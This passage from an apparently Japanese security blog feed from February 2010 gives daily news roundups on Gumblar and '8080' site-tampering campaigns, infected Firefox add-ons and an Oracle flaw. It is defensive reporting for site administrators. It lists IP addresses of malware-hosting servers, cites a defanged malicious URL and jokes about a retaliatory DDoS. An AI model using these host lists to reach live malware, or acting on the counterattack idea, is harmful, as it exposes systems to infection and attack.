<span class="cAttention">91.121.4.99</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<span class="cAttention">91.121.86.130</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<span class="cAttention">94.23.4.164</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<span class="cAttention">217.23.5.27</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:49981"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS49981</a>(WORLDSTREAM) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-netherlands.jpg" class="cFlag" alt="" title="オランダ" /><br />
<br />
というわけで、cache の関係か何か不明ですが、４系統に分離・・<br />
もうタスケテ・・<br />
<br />
----------<br />
<strong>Google Safe Browsing</strong><br />
| 1265504418 | B    | [goog-black-hash 1.50481 update] <br />
| 1265504405 | M    | [goog-malware-hash 1.19186 update]<br />
|   314396 | -1734(316130) 利益確定売り（違！）<br />
|  1334372 | <br />
EoF</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/07/feb-07-2010-sun/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/07/feb-07-2010-sun/" />
	</item>
		<item>
		<title>2010.02.06 土曜日</title>
		<link>http://www3.atword.jp/gnome/2010/02/06/feb-06-2010-sat/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/06/feb-06-2010-sat/#comments</comments>
		<pubDate>Sat, 06 Feb 2010 02:48:34 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[security]]></category>

		<category><![CDATA[CNet]]></category>

		<category><![CDATA[Firefox]]></category>

		<category><![CDATA[heise]]></category>

		<category><![CDATA[Ilion]]></category>

		<category><![CDATA[ITmedia]]></category>

		<category><![CDATA[Katakai]]></category>

		<category><![CDATA[Mozilla]]></category>

		<category><![CDATA[mycom]]></category>

		<category><![CDATA[net-security]]></category>

		<category><![CDATA[Oracle]]></category>

		<category><![CDATA[samarevo]]></category>

		<category><![CDATA[SANS]]></category>

		<category><![CDATA[Schwartz]]></category>

		<category><![CDATA[SmileBanana]]></category>

		<category><![CDATA[so-net]]></category>

		<category><![CDATA[TheRegister]]></category>

		<category><![CDATA[Twitter]]></category>

		<category><![CDATA[UCC]]></category>

		<category><![CDATA[Websense]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7413</guid>
		<description><![CDATA[

海苔の日
全国海苔貝類漁業協同組合連合会が全国海苔漁民の総意として1966年に制定。
大宝元年（701 年）に制定された日本最古の成文法典である「大宝律令」によれば、29種類の海産物が租税(租庸調)として納められ、そ [...]]]></description>
			<content:encoded><![CDATA[<p>
<div class="div10refer"></div>
<a href="http://ja.wikipedia.org/wiki/%E6%B5%B7%E8%8B%94"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />海苔</a>の日<br />
<div class="div10refer"><a href="http://www.zennori.or.jp/">全国海苔貝類漁業協同組合連合会</a>が全国海苔漁民の総意として1966年に制定。<br />
大宝元年（701 年）に制定された日本最古の成文法典である「<a href="http://ja.wikipedia.org/wiki/%E5%A4%A7%E5%AE%9D%E5%BE%8B%E4%BB%A4"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />大宝律令</a>」によれば、29種類の海産物が<a href="http://ja.wikipedia.org/wiki/%E7%A7%9F%E7%A8%8E"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />租税</a>(<a href="http://ja.wikipedia.org/wiki/%E7%A7%9F%E5%BA%B8%E8%AA%BF"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />租庸調</a>)として納められ、そのうち8種類が海藻で、海苔がその1つとして表記されている。<br />
※<a href="http://sgenji.jp/newspaper/ft_article.php">第12回　黒い紙　剣千年 -- スーパー源氏</a></div>
<a href="http://ja.wikipedia.org/wiki/%E5%BE%A1%E7%87%88%E7%A5%AD"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />御燈祭</a>（和歌山県<a href="http://ja.wikipedia.org/wiki/%E6%96%B0%E5%AE%AE%E5%B8%82"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />新宮市</a>）<br />
<a href="http://ja.wikipedia.org/wiki/%E6%8A%B9%E8%8C%B6"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />抹茶</a>の日<br />
愛知県の<a href="http://ja.wikipedia.org/wiki/%E8%A5%BF%E5%B0%BE"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />西尾市</a>茶業振興協議会が西尾茶創業120年を記念して制定。<br />
<div class="div10refer"><a href="http://www.city.nishio.aichi.jp/index.cfm/8,5998,92,415,html">お茶についてのお話５</a></div>
<a href="http://ja.wikipedia.org/wiki/%E3%83%96%E3%83%AD%E3%82%B0"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />ブログ</a>の日<br />
<div class="div10refer"><a href="http://ja.wikipedia.org/wiki/%E3%82%B5%E3%82%A4%E3%83%90%E3%83%BC%E3%82%A8%E3%83%BC%E3%82%B8%E3%82%A7%E3%83%B3%E3%83%88"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />サイバーエージェント</a>が2007年、語呂合わせで「ブログの日」と定める。</div>
<br />
----------<br />
<strong>いい仕事してますね</strong><br />
&#169;<a href="http://ja.wikipedia.org/wiki/%E4%B8%AD%E5%B3%B6%E8%AA%A0%E4%B9%8B%E5%8A%A9"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />中島誠之助</a>氏<br />
<a href="http://www.so-net.ne.jp/security/news/view.cgi?type=2&amp;no=2144"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_so-net.gif" class="cIcon" alt="" />「ガンブラー攻撃」対象ソフトをJPCERTが確認～サイト管理者の注意点は？</a><br />
書こうかなぁとか思ってたことが全部、しかも美しく書かれていたので、感激しました。<br />
「中の人」は判るとおもいますが、FTPのパスワード変更って実は結構大変なんですよね（あちこちにネゴとらないといけないので）・・・で、外注側からなかなか言いにくい面はあると思います。むしろ発注側が積極的に「パスワード管理はどうなってるんだ！？」と聞いてくれるのが理想なのですが（<span class="cHide">そういうところはとっくの昔にやってますよね</span>）<br />
<br />
特に重要なのは<br />
<span class="cAttention">・引越し後の旧サイトが改ざん<br />
　新サイトのリンクを入れたトップページだけ残し、新サイトに引越し。その後、管理者のパソコンがウイルス感染してアカウント情報が盗まれ、トップページだけの旧サイトが改ざん。管理者は気付かず放置されたまま。<br />
・テストサイトも改ざん<br />
　制作中のテストサイトなのか、納品前のデモとして使用したのか、一目見てテストサイトとわかるサイトが改ざんされたまま放置。社名ロゴ付き（本体は別所ですでに運営中）のまま放置されている例も。</span><br />
<span class="cBurn">・改ざん対象は現行サイトだけではないので、過去に管理していたサイトにも注意を。</span><br />
このへんは、もう ISPから指摘されないと気が付かないレベルにあります。また、テスト環境が陥落した場合、顧客にも（全く謂れの無い）迷惑がかかることにもなり、お互いの信頼関係にひびを入れることにもつながります。<br />
<br />
自分の管理下にあるサーバを見直し、過去のテスト環境（StagingやDevelop）が残っていないか、仮に残っていた場合それは本当に必要なのか？　再チェックする良い機会です。<br />
発注側は、外向け環境でテストしたサンプルサイトが残っていないか、今一度確認してみましょう。<br />
<br />
※テスト、サンプルサイトを 「Basic認証をかけているから大丈夫！」などと思っていると、陥落後に .htaccess を消されたりして目も当てられない事態になったり・・（苦笑）<br />
<br />
----------<br />
<strong>Firefox 公式配布Add-on にマルウェア</strong><br />
<a href="http://blog.mozilla.com/security/2010/02/05/security-issues-with-two-experimental-add-ons/"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_mozilla2.gif" class="cIcon" alt="" />Security Issues With Two Experimental Add-Ons</a><br />
<a href="http://blog.mozilla.com/addons/2010/02/04/please-read-security-issue-on-amo/"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_mozilla2.gif" class="cIcon" alt="" />Please read: Security Issue on AMO</a><br />
<br />
<span class="cBurn">Sothink Web Video Downloader (Version 4.0)</span><br />
infected: <a href="http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=PWS%3aWin32%2fLdpinch.gen"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoft.gif" class="cIcon" alt="" />PWS:Win32/Ldpinch.gen</a><br />
<span class="cBurn">Master Filer (all versions)</span><br />
infected: <a href="http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Backdoor%3AWin32%2FBifrose"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoft.gif" class="cIcon" alt="" />Backdoor:Win32/Bifrose</a><br />
<br />
※この PWS:Win32/Ldpinch.gen はかなり古いトロイで、少なくとも2008.02頃のものという話です（検体入手不能なので何ともいえませんが）<br />
<a href="https://msmvps.com/blogs/spywaresucks/archive/2010/02/05/1755362.aspx"><img src="http://www3.atword.jp/gnome/files/2010/02/ic_spywaresucks.gif" class="cIcon" alt="" />Malware infected Firefox Add-Ons – again </a><br />
<br />
<a href="http://journal.mycom.co.jp/news/2010/02/05/028/?rt=na"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_mycomjournal.gif" class="cIcon" alt="" />Firefoxエクステンション、トロイの木馬発覚</a><br />
<span class="cRefer">マルウェア検出ツールがMaster Filerの検出に失敗。新しく2つのマルウェア検出ツールを追加し全アドオンを再チェックしたところ、結果としてSothink Web Video Downloader 4.0にもマルウェアが含められていることが発覚したという。</span><br />
<br />
チェックミスとはいえ、ちょっとこれは・・<br />
なぜVirusTotalに投げなかったんだ？とか言われてますね（笑）<br />
<br />
----------<br />
<strong>UCC</strong><br />
<a href="http://www.ucc.co.jp/gcs/twitter.html"><img src="http://www3.atword.jp/gnome/files/2010/02/ic_ucc.gif" class="cIcon" alt="" />Twitterでのキャンペーン告知に関するお詫び</a><br />
<a href="http://www.itmedia.co.jp/news/articles/1002/05/news076.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_itmedia.gif" class="cIcon" alt="" />UCC、Twitterでのキャンペーン告知を謝罪　複数アカウントのBOTでメッセージ送信</a><br />
これだけ見て、自分も？だったのですが、<br />
<a href="http://d.hatena.ne.jp/hagex/20100206"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_hatena_d_ocher.gif" class="cIcon" alt="" />[Web] UCCがTwitterを使ってスパム行為!?</a><br />
なるほど・・これは <s>すご</s> ひどい・・<br />
新サービスを何かに使うときは、しばらくリサーチしてからにしないと、「できること」と「やっていいこと」の境界が見えにくいことがあります。<br />
<a href="http://japan.cnet.com/news/media/story/0,2000056023,20408135,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_cnet_black.gif" class="cIcon" alt="" />UCC、Twitterを使用したPR活動で謝罪--botでキャンペーン告知を大量送付</a><br />
<span class="cRefer">「新しいコミュニケーションツールとして期待したが、理解が不十分だった。（botを起用したことについて）十分なリスクを検討できていなかった。今後はそれらを踏まえて、活動していきたい」</span><br />
<span class="cCom">でもまぁ個人的にはドンマイ・・かな</span><br />
<br />
<span class="cHide">私自身はTwitterを使いこなせてないのでなんとも・・</span><br />
<br />
<a href="http://twitter.com/teraminato/status/8664729895"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_twitter.gif" class="cIcon" alt="" />炎上マーケティングではなく焙煎マーケティングw</a><br />
誰うま・・・！？<br />
<br />
----------<br />
<strong>User 2.0</strong><br />
そういえば、 Web 2.0 という言葉が形骸化したのはいつ頃でしょうか？<br />
<a href="http://isc.sans.org/diary.html?storyid=8158"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_sans.gif" class="cIcon" alt="" />Dealing with User 2.0</a><br />
<span class="cRefer">So here is you homework for the weekend.  How will you deal with User 2.0? How are you going to protect your corporate data without saying "Nay" to things like facebook, IM, own equipment, own applications, own …….?  How will you sort data leakage, remote access, licensing issues, malware in an environment where you maybe have no control or access over the endpoint?  Do you treat everyone with their own equipment as strangers and place them of the "special" VLAN? How do you deal with the Mac users that insist their machines cannot be infected?  Enjoy thinking about User 2.0</span><br />
どひゃ～<br />
なんというイヤな宿題なんでしょう（苦笑）<br />
telnetが死に、今 FTP が逝こうとしている中、次の命題はなんなんでしょうね？<br />
<span class="cCom">※厳密なアクセス制御とホワイトリスティングかな？</span><br />
<br />
----------<br />
<strong>Oracleも</strong><br />
<a href="http://www.h-online.com/security/news/item/Vulnerability-in-Oracle-11gR2-allows-system-privileges-for-all-923143.html"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_h-security.gif" class="cIcon" alt="" />Vulnerability in Oracle 11gR2 allows system privileges for all </a><br />
<span class="cRefer">Overgenerous privileges for Java procedures allow users to escalate their own privileges, up to the point of gaining complete control over the database in Oracle's latest 11gR2 database release.</span><br />
これも BlackHat ネタですね。<br />
<br />
<a href="http://www.oracle.com/technology/deploy/security/alerts/alert-cve-2010-0073.html"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_oracle.gif" class="cIcon" alt="" />Oracle Security Alert for CVE-2010-0073</a><br />
<br />
微妙に続く<br />
----------<br />
<strong>さよならは俳句で</strong><br />
<a href="http://twitter.com/OpenJonathan/status/8620937722"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_twitter.gif" class="cIcon" alt="" />OpenJonathan</a><br />
<span class="cRefer">Today's my last day at Sun. I'll miss it. Seems only fitting to end on a <a href="http://twitter.com/search?q=%23haiku"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_twitter.gif" class="cIcon" alt="" />#haiku</a>. <u>Financial crisis/Stalled too many customers/CEO no more</u></span><br />
<a href="http://japan.internet.com/busnews/20100205/11.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_j_internet_com.gif" class="cIcon" alt="" />Sun を率いた Schwartz 氏、『Twitter』で去就語る</a><br />
<span class="cRefer">Schwartz 氏は4日未明、Twitter で自身の去就を「つぶやいた」。<br />
「今日は Sun にいる最後の日だ。寂しくなる。最後はやはり俳句で締めるのがいいだろう。金融危機 / 疲弊客はいと多く / CEO の職を去る」と同氏は書き込んだ。</span><br />
これまでありがとう、そしてご苦労様でした。<br />
<br />
<a href="http://blogs.sun.com/katakai/"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_oracle.gif" class="cIcon" alt="" />Masaki Katakai's Weblog</a><br />
このfaviconにも慣れないといけないのでしょうね<br />
<br />
----------<br />
<strong>また何か・・</strong><br />
<a href="http://securitylabs.websense.com/content/Blogs/3545.aspx"><img src="http://www3.atword.jp/gnome/files/2009/06/ic_websense.gif" class="cIcon" alt="" />An In-Depth Exploit Analysis on Multilayer Obfuscations</a><br />
激しい難読化ですね・・<br />
<br />
しかし使っているのは MDAC(<a href="http://www.microsoft.com/japan/technet/security/bulletin/MS06-014.mspx?rss_fdn=Technet%20Security"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_microsoft.gif" class="cIcon" alt="" />[MS06-014]</a>)しか確認できなかったようで、何とも言えません。<br />
<br />
最近の悪意散布サイトは「1回だけよ」というケチなサイトが多く、ウィルス対策ベンダーも大変そうです。<br />
<br />
----------<br />
<strong>Adobe とToyota の共通点?</strong><br />
<a href="http://www.theregister.co.uk/2010/02/05/adobe_security_modest_proposal/"><img src="http://www3.atword.jp/gnome/files/2009/07/ic_the_register.gif" class="cIcon" alt="" />Dear Adobe: It's time for security rehab</a><br />
どちらも一番ユーザにとって重要な部分を、比較的に見て軽視する傾向がある・・・のかな？<br />
<br />
Toyota 問題は範疇外なのでアレですが、個人的にAdobeを擁護する気には、あまりなれません。<br />
同時に、MSはAdobe製品がデファクト・スタンダードになっていることを認識し、Microsoft Updateに組み込んで欲しいと思っていますが・・・<br />
<br />
----------<br />
<strong>法案H.R.4061</strong><br />
<a href="http://japan.cnet.com/news/sec/story/0,2000056024,20408117,00.htm"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_cnet_black.gif" class="cIcon" alt="" />サイバーセキュリティ法案、米下院を通過</a><br />
<span class="cRefer">米下院は、サイバー攻撃に対する政府の備えを充実させるために、訓練、研究、および調整の拡充を掲げたサイバーセキュリティ法案を圧倒的多数で承認した。</span><br />
<br />
----------<br />
<strong>Gumblar(本物)</strong><br />
このカテゴリーは妙にツボったので流用させていただきます(笑)<br />
<a href="http://ilion.blog47.fc2.com/blog-entry-171.html"><img src="http://www3.atword.jp/gnome/files/2009/05/ico_fc2.gif" class="cIcon" alt="" />gumblar(本物) -- FFXI(仮)</a><br />
Ilion様も書かれていますが、インジェクションの方法がかなり違うので、チェック箇所を誤らないようにしてください。<br />
<br />
Gumblar(本物)のインジェクションは、URIのみの単純なスクリプトで、phpの後に半角の空白があるのが特徴です。これのイヤらしいところは、8080系と違ってインジェクションの飛ばし先も<a href="http://www.viruslist.com/en/weblog?weblogid=208187897"><img src="http://www3.atword.jp/gnome/files/2009/08/ic_kaspersky-virusl.gif" class="cIcon" alt="" />不特定多数の陥落サイト群</a>なので、潰しても潰してもキリが無い点にあります。<br />
<span class="cCom">※8080系もキリがないんですけど、nginxをインストールできる環境が限られているせいか、そろそろ攻撃側が引きそうな予感も</span><br />
<br />
<a href="http://excomp.cocolog-nifty.com/blog/2010/02/gumblar-8a96.html"><img src="http://www3.atword.jp/gnome/files/2009/12/ic_samarebo.gif" class="cIcon" alt="" />【サイト改竄報告】gumblar復活か？</a><br />
<br />
----------<br />
<strong>iPhoneのパスワードを忘れたら？</strong><br />
<a href="http://www.net-security.org/secworld.php?id=8824"><img src="http://www3.atword.jp/gnome/files/2009/12/ic_help_net_security.gif" class="cIcon" alt="" />Cracking encrypted iPhone backups</a><br />
悪用が怖いけどメモメモ<br />
<br />
----------<br />
<strong>今日の更新が遅れた訳</strong><br />
<a href="http://www.smilebanana.com/archives/2010/02/05-2243.php"><img src="http://www3.atword.jp/gnome/files/2010/01/ic_smilebanana.gif" class="cIcon" alt="" />睡眠勤務</a><br />
まさにこんな感じでした。<br />
おかしいなぁ・・・書いてたつもりでテーブルに突っ伏して寝てたら8時半・・・しかも、書いてたつもりの txtは見当たらない・・・<br />
<br />
<span class="cHide">だって手当無しだなんてそんな劣悪な会社がこのJapanにあるわけないじゃないですかァ！<br />
あるわけないですよね！！！　・・・・・</span><br />
<br />
<span class="cHide">書いちゃらめ～なネタなのでこの辺で CUT!（苦笑）</span><br />
<br />
----------<br />
<strong>8080</strong><br />
* NEW * ISP/IP<br />
<span class="cBurn">78.41.156.236</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:6908"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS6908</a>(DATAHOP) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" title="英" /><br />
<br />
<span class="cAttention">78.31.107.49</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:24931"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS24931</a>(DEDIPOWER) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-unitedkingdom.jpg" class="cFlag" alt="" title="英" /><br />
<span class="cAttention">84.200.227.144</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:31400"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS31400</a>(ACCELERATED) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<span class="cAttention">94.23.199.154</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:16276"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS16276</a>(OVH Paris) <img src="http://www3.atword.jp/gnome/files/2010/02/flag-france.gif" class="cFlag" alt="" title="フランス" /><br />
<span class="cAttention">94.199.240.61</span> <a href="http://www.google.com/safebrowsing/diagnostic?site=AS:39023"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_googlecolorful.gif" class="cIcon" alt="" />AS39023</a>(IU-AS) <img src="http://www3.atword.jp/gnome/files/2009/04/flag-germany.jpg" class="cFlag" alt="" title="ドイツ" /><br />
<br />
2系統あったラウンドロビンが、今日は1系統のみ<br />
こういうときは新たなドメインが生まれることがあるので注意しなければ・・<br />
新ドメインを見つけた方は教えてください。<br />
<br />
----------<br />
<strong>Google Safe Browsing</strong><br />
| 1265418025 | B    | [goog-black-hash 1.50409 update] <br />
| 1265418001 | M    | [goog-malware-hash 1.19161 update]<br />
|   316130 | +7970(308160) ちょっとちょっと・・　増えすぎ！<br />
|  1332178 | <br />
EoF</p>
]]></content:encoded>
			<wfw:commentRss>http://www3.atword.jp/gnome/2010/02/06/feb-06-2010-sat/feed/</wfw:commentRss>
		<xhtml:link rel="alternate" media="handheld" type="text/html" href="http://www3.atword.jp/gnome/2010/02/06/feb-06-2010-sat/" />
	</item>
		<item>
		<title>2010.02.05 金曜日</title>
		<link>http://www3.atword.jp/gnome/2010/02/05/feb-05-2010-fri/</link>
		<comments>http://www3.atword.jp/gnome/2010/02/05/feb-05-2010-fri/#comments</comments>
		<pubDate>Fri, 05 Feb 2010 00:13:45 +0000</pubDate>
		<dc:creator>gnome</dc:creator>
		
		<category><![CDATA[security]]></category>

		<category><![CDATA[blackhat]]></category>

		<category><![CDATA[Gumblar]]></category>

		<category><![CDATA[gumblar.cn]]></category>

		<category><![CDATA[IBM Tokyo SOC]]></category>

		<category><![CDATA[ITmedia]]></category>

		<category><![CDATA[ITPro]]></category>

		<category><![CDATA[JIT-spray]]></category>

		<category><![CDATA[JPCERT/CC]]></category>

		<category><![CDATA[Kaspersky]]></category>

		<category><![CDATA[Microsoft]]></category>

		<category><![CDATA[noooo_spam]]></category>

		<category><![CDATA[Pushdo]]></category>

		<category><![CDATA[so-net]]></category>

		<category><![CDATA[sonodam]]></category>

		<category><![CDATA[Sophos]]></category>

		<category><![CDATA[SpyEye]]></category>

		<category><![CDATA[Symantec]]></category>

		<category><![CDATA[TechCrunch]]></category>

		<category><![CDATA[TheRegister]]></category>

		<category><![CDATA[TrendMicro]]></category>

		<category><![CDATA[USCERT]]></category>

		<category><![CDATA[WashingtonPost]]></category>

		<category><![CDATA[ZeuS]]></category>

		<guid isPermaLink="false">http://www3.atword.jp/gnome/?p=7400</guid>
		<description><![CDATA[

長崎二十六聖人殉教の日
プロ野球の日
1936年、全日本職業野球連盟が結成され、プロ野球が誕生した。
当時の加盟チームは、東京巨人軍、大阪タイガース、名古屋ドラゴンズ、東京セネタース、名古屋金鯱軍、阪急軍、大東京軍の [...]]]></description>
			<content:encoded><![CDATA[<p>
<div class="div10refer"></div>
<a href="http://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E4%BA%8C%E5%8D%81%E5%85%AD%E8%81%96%E4%BA%BA"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />長崎二十六聖人</a>殉教の日<br />
<a href="http://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E3%83%97%E3%83%AD%E9%87%8E%E7%90%83"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />プロ野球</a>の日<br />
<div class="div10refer">1936年、<a href="http://ja.wikipedia.org/wiki/%E6%97%A5%E6%9C%AC%E9%87%8E%E7%90%83%E9%80%A3%E7%9B%9F_(%E3%83%97%E3%83%AD%E9%87%8E%E7%90%83)"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />全日本職業野球連盟</a>が結成され、プロ野球が誕生した。<br />
当時の加盟チームは、<a href="http://ja.wikipedia.org/wiki/%E8%AA%AD%E5%A3%B2%E3%82%B8%E3%83%A3%E3%82%A4%E3%82%A2%E3%83%B3%E3%83%84"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />東京巨人軍</a>、<a href="http://ja.wikipedia.org/wiki/%E9%98%AA%E7%A5%9E%E3%82%BF%E3%82%A4%E3%82%AC%E3%83%BC%E3%82%B9"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />大阪タイガース</a>、<a href="http://ja.wikipedia.org/wiki/%E4%B8%AD%E6%97%A5%E3%83%89%E3%83%A9%E3%82%B4%E3%83%B3%E3%82%BA"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />名古屋ドラゴンズ</a>、<a href="http://ja.wikipedia.org/wiki/%E7%BF%BC%E8%BB%8D"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />東京セネタース</a>、<a href="http://ja.wikipedia.org/wiki/%E5%90%8D%E5%8F%A4%E5%B1%8B%E9%87%91%E9%AF%B1%E8%BB%8D"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />名古屋金鯱軍</a>、<a href="http://ja.wikipedia.org/wiki/%E3%82%AA%E3%83%AA%E3%83%83%E3%82%AF%E3%82%B9%E3%83%BB%E3%83%90%E3%83%95%E3%82%A1%E3%83%AD%E3%83%BC%E3%82%BA"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />阪急軍</a>、<a href="http://ja.wikipedia.org/wiki/%E6%9D%BE%E7%AB%B9%E3%83%AD%E3%83%93%E3%83%B3%E3%82%B9"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />大東京軍</a>の7チーム。 </div>
笑顔の日 [2-5]<br />
<a href="http://ja.wikipedia.org/wiki/%E5%8F%8C%E5%AD%90"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_wikipedia.gif" class="cIcon" alt="" />ふたご</a>の日 [2-5]<br />
<br />
----------<br />
<strong><span class="cBurn">[WARNING]</span></strong><br />
<a href="http://blogs.yahoo.co.jp/noooo_spam/59488040.html"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_yahoo.gif" class="cIcon" alt="" />2010年2月 「Gumblar.x」の改ざん攻撃再開 -- 無題なブログ</a><br />
最近おとなしくなっていた「本家」Gumblar.x側も再開している模様です。<br />
手持ちの陥落リストのサイトで再改ざんされたところは見当たらなかったのですが、しつこさには定評のあるgumblarですので更に手口を変えてくるかもしれません。<br />
攻撃自体は<br />
<a href="http://wepawet.iseclab.org/view.php?hash=0889fd6fd4a62de42362fca9e4d42cc8&amp;t=1265321045&amp;type=js"><img src="http://www3.atword.jp/gnome/files/2009/04/ico_wepawet.gif" class="cIcon" alt="" />Analysis report for hXXp://enpucon.cl/</a><br />
あまり代わり映えしない感じですね。<br />
ひょっとしたら一部の Infectorだけが再起動したのかもしれませんが、いずれにせよ要注意です。<br />
<br />
<a href="http://www.kaspersky.co.jp/news?id=207578800"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_kaspersky.gif" class="cIcon" alt="" />マルウェアマンスリーレポート : 2010 年 1 月</a><br />
<span class="cRefer"><a href="http://www.kaspersky.co.jp/news?id=207581599"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_kaspersky.gif" class="cIcon" alt="" />Gumblar の大流行</a> については、2 回目である今回はかなり早く収束したと言えるでしょう。</span><br />
言霊・・・<br />
<br />
<a href="http://d.hatena.ne.jp/sonodam/20100204/p1"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_hatena.gif" class="cIcon" alt="" />[セキュリティ]ガンブラー対策</a><br />
逆FTP-DDoSとか、環境が整えば楽しいのかもしれませんね・・<br />
（やっていいのかどうかは別ですが・笑）<br />
<br />
続く<br />
----------<br />
<strong>一方、8080</strong><br />
TokyoSOCさんのほうからレポートがでていましたが<br />
<a href="http://www-935.ibm.com/services/jp/index.wss/consultantpov/secpriv/b1334094?cntxt=a1010214"><img src="http://www3.atword.jp/gnome/files/2009/03/ico_ibm.gif" class="cIcon" alt="" />Gumblarと類似したWebサイト改ざんを利用する攻撃 -2010年1月検知状況-【Tokyo SOC Report】</a><br />
PDFのヒット率が高いなぁ・・<br />
<br />
また、JPCERT/CC の<a href="https://www.jpcert.or.jp/at/2010/at100005.txt"><img src="http://www3.atword.jp/gnome/files/2009/12/ic_jpcertcc.gif" class="cIcon" alt="" />FTP Client 報告書</a>を受け、いろいろ記事が飛び交っています。<br />
<a href="http://itpro.nikkeibp.co.jp/article/NEWS/20100204/344169/?ST=security"><img src="http://www3.atword.jp/gnome/files/2009/02/ico_it_nikkei.gif" class="cIcon" alt="" />保存したパスワードを盗むウイルスに注意、「ガンブラー」で感染 </a><br />
